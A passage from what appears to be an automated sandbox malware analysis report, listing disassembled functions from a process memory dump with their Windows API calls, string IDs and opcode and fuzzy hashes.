                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: d
                                                                                                                • API String ID: 0-2564639436
                                                                                                                • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset
                                                                                                                • String ID: BINARY
                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1161345128-0
                                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: /stext
                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                • String ID:
                                                                                                                • API String ID: 159017214-0
                                                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3150196962-0
                                                                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc
                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmpmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1065087418-0
                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1297977491-0
                                                                                                                • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                                                                                • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                                                                                • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1481295809-0
                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3150196962-0
                                                                                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                                                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$PointerRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 3154509469-0
                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4232544981-0
                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859505661-0
                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
